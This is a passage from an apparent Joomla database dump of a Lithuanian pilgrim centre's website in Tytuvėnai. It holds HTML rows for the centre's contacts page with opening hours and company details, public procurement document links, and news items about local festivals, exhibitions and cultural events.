src=\"images/stories/pdf.png\" border=\"0\" alt=\"Sample Image\" style=\"border: 0;\" /></a></td>\r\n<td><a href=\"images/cv.pdf\" target=\"_blank\">Gyvenimo aprašymas</a></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n </td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><strong>Gidė - vadybininkė Rūta Krencienė</strong><br /> El. paštas: <a href=\"mailto:r.krenciene@infotytuvenai.lt\">r.krenciene@infotytuvenai.lt</a></p>\r\n<p><strong>Administratorė Neringa Rudauskienė</strong><br /><span>Mob. tel. +370 675 58506</span><br />El. paštas: <a href=\"mailto:info@infotytuvenai.lt\">info@infotytuvenai.lt</a></p>\r\n<p><strong>Ūkio dalies vedėjas Romualdas Mozeris</strong><br /><span>Mob. tel. +370 610 26401</span><br />El. paštas: <a href=\"mailto:info@infotytuvenai.lt\">info@infotytuvenai.lt</a></p>\r\n<p> </p>\r\n<p><strong>DARBO LAIKAS</strong></p>\r\n<p style=\"text-align: left;\" align=\"center\"><span style=\"font-size: 12.16px;\">(NE SEZONO METU)</span></p>\r\n<p><strong>PIRMADIENIS               8.00 – 17.00</strong></p>\r\n<p><strong>ANTRADIENIS              8.00 – 17.00</strong></p>\r\n<p><strong>TREČIADIENIS             8.00 – 17.00</strong></p>\r\n<p><strong>KETVIRTADIENIS         8.00 - 17.00</strong></p>\r\n<p><strong>PENKTADIENIS            8<strong>.00 - 17.00</strong></strong></p>\r\n<p><strong>ŠEŠTADIENIS               9<strong><strong>.00 - 18.00</strong></strong><strong><strong><br /></strong></strong></strong></p>\r\n<p><strong>SEKMADIENIS             <strong> 10<strong><strong><strong>.00 - 15.00</strong></strong></strong><strong><strong><strong><strong><strong><br /></strong></strong></strong></strong></strong></strong></strong></p>\r\n<p><strong><strong><strong><strong>Pietų pertrauka            12.00 - 12.45</strong></strong></strong></strong></p>\r\n<p><strong> </strong></p>\r\n<p><strong>WORK TIME</strong></p>\r\n<p><strong><strong>MONDAY-FRIDAY<strong><strong><strong><strong><strong> </strong></strong></strong></strong>  8.00 – 17.00</strong></strong></strong></p>\r\n<p><strong><strong><strong>SATURDAY</strong>               9<strong>.00 – 18.00</strong></strong></strong></p>\r\n<p><strong>SUNDAY                   10<strong><strong><strong>.00 – 15.00</strong></strong></strong><br /></strong></p>\r\n<p><strong><strong><strong><strong>Lunchtime                <strong>12.00 - 12.45</strong></strong></strong></strong></strong></p>\r\n<p> </p>\r\n<p> </p>\r\n<p>REKVIZITAI:</p>\r\n<p>Viešoji įstaiga „Tytuvėnų piligrimų centras\"</p>\r\n<p>Įmonės kodas 301639534</p>\r\n<p>PVM kodas LT100010846612</p>\r\n<p>Adresas: Maironio g. 2a, LT-86486 Tytuvėnai, Kelmės r.</p>\r\n<p>Interneto svetainė <a href=\"http://www.infotytuvenai.lt/\">www.infotytuvenai.lt</a></p>\r\n<p>El. paštas <a href=\"mailto:info@infotytuvenai.lt\">info@infotytuvenai.lt</a></p>\r\n<p>A.s. LT73 7300 0101 0722 1378,</p>\r\n<p>AB \"Swedbank\"</p>','',1,0,0,43,'2011-04-08 13:22:44',135,'','2024-05-01 17:15:10',135,135,'2024-09-30 12:56:33','2011-04-08 13:22:44','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"0\",\"link_titles\":\"0\",\"show_intro\":\"0\",\"show_category\":\"0\",\"link_category\":\"0\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"0\",\"link_author\":\"\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"1\",\"show_email_icon\":\"1\",\"show_vote\":\"0\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',135,0,4,'kontaktai, telefonas, įmonės kodas, adresas','',1,57025,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(343,432,'XVII Tytuvėnų vasasaros festivalis','xvii-tytuvenu-vasasaros-festivalis','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">2020 m. liepos 12 d. - rugpjūčio 23 d.<br /></span></p>\r\n','\r\n<p style=\"text-align: justify;\"><img src=\"images/stories/naujienos/festivalis17/full1.jpg\" border=\"0\" alt=\"\" /></p>',1,0,0,44,'2020-07-07 19:14:03',135,'','2020-07-07 19:15:15',135,0,'0000-00-00 00:00:00','2020-07-07 19:14:03','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/festivalis17\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,0,46,'','',1,1915,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(332,421,'Degustacinė vakarienė','degustacine-vakariene','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><strong>Gegužės 25 d. 19 val.</strong><br /> Ateik, paragauk, įvertink...<br /> Vakaro metu pristatysime naujus patiekalus...<br /> Kaina 17 eur.</span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><img src=\"images/stories/naujienos/degustacine_vakariene/degustacine vakariene.jpg\" border=\"0\" alt=\"\" /></span></span></span></span></span></p>',1,0,0,44,'2019-05-14 20:28:42',135,'','2019-05-14 20:31:57',135,0,'0000-00-00 00:00:00','2019-05-14 20:28:42','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/degustacine_vakariene\\/degustacine.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,0,57,'','',1,2116,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(95,179,'Viešieji pirkimai','vieieji-pirkimai','','<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><a href=\"images/stories/viesieji_pirkimai/isakymas_del_vp_taisykliu_patvirtinimo.pdf\" target=\"_blank\"><img src=\"images/stories/pdf.png\" border=\"0\" alt=\"Sample Image\" style=\"border: 0;\" /></a></td>\r\n<td><a href=\"images/stories/viesieji_pirkimai/isakymas_del_vp_taisykliu_patvirtinimo.pdf\" target=\"_blank\">Įsakymas dėl viešųjų pirkimų taisyklių </a></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><a href=\"images/stories/viesieji_pirkimai/2015_02_12_vp_pirkimu_taisykles.pdf\" target=\"_blank\"><img src=\"images/stories/pdf.png\" border=\"0\" alt=\"Sample Image\" style=\"border: 0;\" /></a></td>\r\n<td><a href=\"images/stories/viesieji_pirkimai/2015_02_12_vp_pirkimu_taisykles.pdf\" target=\"_blank\">Viešųjų pirkimų taisyklės</a></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p> </p>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><a href=\"images/stories/viesieji_pirkimai/2017_m_viesuju_pirkimu_planas.pdf\" target=\"_blank\"><img src=\"images/stories/pdf.png\" border=\"0\" alt=\"Sample Image\" width=\"34\" height=\"34\" style=\"border: 0;\" /></a></td>\r\n<td><a href=\"images/stories/viesieji_pirkimai/2017_m_viesuju_pirkimu_planas.pdf\" target=\"_blank\">Všį \"Tytuvėnų piligrimų centras\" planuojamų viešųjų pirkimų 2017 m. planas</a></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><a href=\"images/stories/viesieji_pirkimai/2016_m_viesuju_pirkimu_plano_papildymas.pdf\" target=\"_blank\"><img src=\"images/stories/pdf.png\" border=\"0\" alt=\"Sample Image\" width=\"34\" height=\"34\" style=\"border: 0;\" /></a></td>\r\n<td><a href=\"images/stories/viesieji_pirkimai/2016_m_viesuju_pirkimu_plano_papildymas.pdf\" target=\"_blank\">Všį \"Tytuvėnų piligrimų centras\" planuojamų viešųjų pirkimų 2016 m. plano papildymas</a></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><a href=\"images/stories/viesieji_pirkimai/2016_m_planuojamu_viesuju_pirkimu_planas.pdf\" target=\"_blank\"><img src=\"images/stories/pdf.png\" border=\"0\" alt=\"Sample Image\" style=\"border: 0;\" /></a></td>\r\n<td><a href=\"images/stories/viesieji_pirkimai/2016_m_planuojamu_viesuju_pirkimu_planas.pdf\">Všį \"Tytuvėnų piligrimų centras\" planuojamų viešųjų pirkimų 2016 m. planas</a></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><a href=\"http://www.cvpp.lt/index.php?option=com_vpt&amp;Itemid=63&amp;task=search&amp;theme=new&amp;vpt_united=%C4%AEveskite+paie%C5%A1kos+kriterij%C5%B3...&amp;vpt_company=Tytuv%C4%97n%C5%B3+piligrim%C5%B3+centras&amp;vpt_noticetype=0&amp;vpt_jarcode=&amp;vpt_proceduretype=0&amp;vpt_object=&amp;vpt_reporttype=0&amp;vpt_cpvcode=&amp;filter_from=&amp;vpt_participant=&amp;filter_to=&amp;vpt_winner=&amp;vpt_tendertype=&amp;vpt_tenderid=&amp;vpt_social=&amp;vpt_place=&amp;vpt_ts=1&amp;button=&amp;vpt_bussect=\" style=\"font-size: 12.16px;\"><br />Skelbiami techninių specifikacijų projektai<br /><br /></a><a href=\"http://www.cvpp.lt/index.php?option=com_vpt&amp;Itemid=63&amp;task=search&amp;theme=new&amp;vpt_united=%C4%AEveskite+paie%C5%A1kos+kriterij%C5%B3...&amp;button=&amp;vpt_company=Tytuv%C4%97n%C5%B3+piligrim%C5%B3+centras&amp;vpt_noticetype=0&amp;vpt_jarcode=&amp;vpt_proceduretype=0&amp;vpt_object=&amp;vpt_reporttype=0&amp;vpt_cpvcode=&amp;filter_from=&amp;vpt_participant=&amp;filter_to=&amp;vpt_winner=&amp;vpt_tendertype=&amp;vpt_tenderid=&amp;vpt_social=&amp;vpt_place=&amp;vpt_bussect=\" target=\"_blank\" style=\"font-size: 12.16px;\">Paskelbti viešieji pirkimai</a></p>\r\n<p><a href=\"https://www.eviesiejipirkimai.lt/index.php?kuras=0&amp;option=com_vptpublic&amp;task=list&amp;Itemid=65&amp;filter_show=1&amp;filter_limit=10&amp;filter_authority=Vie%C5%A1oji%20%C4%AFstaiga&amp;filter_jarcode=301639534&amp;filter_type=0\"><span>Planuojami viešieji pirkimai</span></a></p>\r\n<p><a href=\"index.php/apie-centra/viesieji-pirkimai/mazos-vertes-uz-2016-m\" style=\"font-size: 12.16px;\">Mažos vertės pirkimai 2016 m.</a></p>\r\n<p> </p>','',0,0,0,43,'2013-02-20 06:06:04',135,'','2017-02-27 10:43:44',135,0,'0000-00-00 00:00:00','2013-02-20 06:06:04','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',55,0,3,'','',1,5250,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(96,180,'Mažos vertės pirkimai','maos-verts-pirkimai','','<table style=\"padding: 0em;\" border=\"0\">\n<tbody>\n<tr>\n<td><a href=\"images/stories/viesieji_pirkimai/mazos_vertes_sausis.pdf\" target=\"_blank\"><img src=\"images/stories/pdf.png\" border=\"0\" alt=\"Sample Image\" style=\"border: 0;\" /></a></td>\n<td><a href=\"images/stories/viesieji_pirkimai/mazos_vertes_sausis.pdf\" target=\"_blank\">Mažos vertės pirkimai. Sausis.</a></td>\n</tr>\n</tbody>\n</table>\n<table border=\"0\">\n<tbody>\n<tr>\n<td><a href=\"images/stories/viesieji_pirkimai/mazos_vertes_vasaris.pdf\" target=\"_blank\"><img src=\"images/stories/pdf.png\" border=\"0\" alt=\"Sample Image\" style=\"border: 0;\" /></a></td>\n<td><a href=\"images/stories/viesieji_pirkimai/mazos_vertes_vasaris.pdf\" target=\"_blank\">Mažos vertės pirkimai. Vasaris.</a></td>\n</tr>\n</tbody>\n</table>','',-2,0,0,43,'2014-03-11 14:52:59',135,'','2014-03-11 15:28:52',135,0,'0000-00-00 00:00:00','2014-03-11 14:52:59','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_section\":\"\",\"link_section\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_vote\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',28,0,2,'','',1,255,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(236,324,'Tapybos darbų paroda','tapybos-darbu-paroda','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Š.m balandžio 10 dienos popietę Tytuvėnų bernardinų vienuolyno bibliotekos salėje ir antrojo aukšto koridoriuje buvo pristatyta Šarūno Šarkausko tapybos darbų paroda. Susirinkusius su dailininku supažindino Tytuvėnų piligrimų centro direktorė Asta Vaitkevičiūtė-Kizienė.</span></p>\r\n','\r\n<p><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">{gallery cols=5 orientation=horizontal <span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">width=330</span> height=180}stories/naujienos/tapybos_darbu_paroda{/gallery}</span></p>\r\n<p> </p>',1,0,0,44,'2015-04-16 11:38:06',135,'','2015-04-16 11:46:59',135,0,'0000-00-00 00:00:00','2015-04-16 11:38:06','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/tapybos_darbu_paroda\\/main\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',13,0,137,'','',1,3728,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(235,323,'Edukacinė programa \"PILIGRIMŲ GIRA\"','edukacine-programa-piligrimu-gira','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Š.m. balandžio 10 dieną Tytuvėnų bernardinų vienuolyno refektorinėje salėje buvo pristatyta nauja edukacinė programa \"PILIGRIMŲ GIRA\". Programą vedė \"piligrimas\" Virginijus, jam pagelbėjo Asta ir Sandra, vienuolyno virtuvėje triūsė Zita ir Romualdas, piligrimų giros gamintojus ir ragautojus įamžino Rūta. KVIEČIAME IR JUS PARAGAUTI GIROS PO SENAISIAIS VIENUOLYNO VIRTUVĖS SKLIAUTAIS.</span></p>\r\n','\r\n<p><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">{gallery cols=5 orientation=horizontal width=300}stories/naujienos/gira0416{/gallery}</span></p>\r\n<p> </p>',0,0,0,44,'2015-04-16 11:26:32',135,'','2015-04-16 11:29:28',135,0,'0000-00-00 00:00:00','2015-04-16 11:26:32','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/gira0416\\/main\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',8,0,138,'','',1,3897,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(100,184,'Laukiame naujienų','laukiame-naujienu','','<p> </p>\n<p>Naujienų laukiame...</p>\n<p> </p>','',0,0,0,44,'2010-07-07 09:54:06',135,'','2011-10-31 20:49:51',135,0,'0000-00-00 00:00:00','2010-07-06 22:00:00','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_section\":\"\",\"link_section\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_vote\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',4,0,199,'','',1,5,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(101,185,'Poezijos skaitymai Tytuvėnų kapinėse','skaitymai-kapinese','','<p> </p>\n<p>Lapkričio 1-ąją dieną, mirusiųjų pagerbimo dieną, vyko poezijos skaitymai Tytuvėnų kapinėse. Buvo skaitoma E.Mieželaičio, Salomėjos Nėries, Bernardo Brazdžionio, Maironio, Vytauto Mačernio ir kt.autorių  poezija, lietuvių liaudies folkloro raudos ir vyrkavimai bei Kelmės rajono literatų kūryba – Teresės Rimulaitytės, Reginos Biržinytės bei Vlado Kalvaičio.<br />Buvo giedamos giesmės.<br />Skaitė ir giedojo Andrėja Gričiutė, Pranas Jurkaitis, Gytis Švilpa.<br />Talkino Tytuvėnų  kultūros centro vadovas Regimantas Zenauskas. Tikimės, kad šie poezijos skaitymai taps kasmetine tradicija.</p>\n<p>VšĮ „Tytuvėnų piligrimų centras“ informacija</p>','',1,0,0,44,'2011-11-04 18:01:19',135,'','0000-00-00 00:00:00',135,0,'0000-00-00 00:00:00','2011-11-04 18:01:19','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_section\":\"\",\"link_section\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_vote\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',1,0,198,'','',1,2069,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(102,186,'Senjorų vakaronė „Jaunystei prisiminti“','jaunystei-prisiminti','','<p> </p>\n<p>Paskutinį spalio šeštadienį Tytuvėnų bernardinų vienuolyno refektorinėje salėje vyko senjorų vakaronė „Jaunystei prisiminti“, kurioje dalyvavo Tytuvėnų gimnazistai (vadovė Andrėja Gričiutė).<br />Jie pristatė meninę kompoziciją „Kur seselė mūsų sėdėjo“ lietuvių liaudies smulkiosios tautosakos motyvais, mokytojų senjorų klubas „Raskila“ (vadovė Teresė Rimulaitytė). Joms talkino Tytuvėnų bibliotekininkė Dalia Galbuogienė. D. Molotokienė pasakojo jumoreskų. <br />Vyko parodos atidarymas. Atidaryta  Aldonos Traškinienės  piešinių paroda „Sibiro Alma Mater“.<br 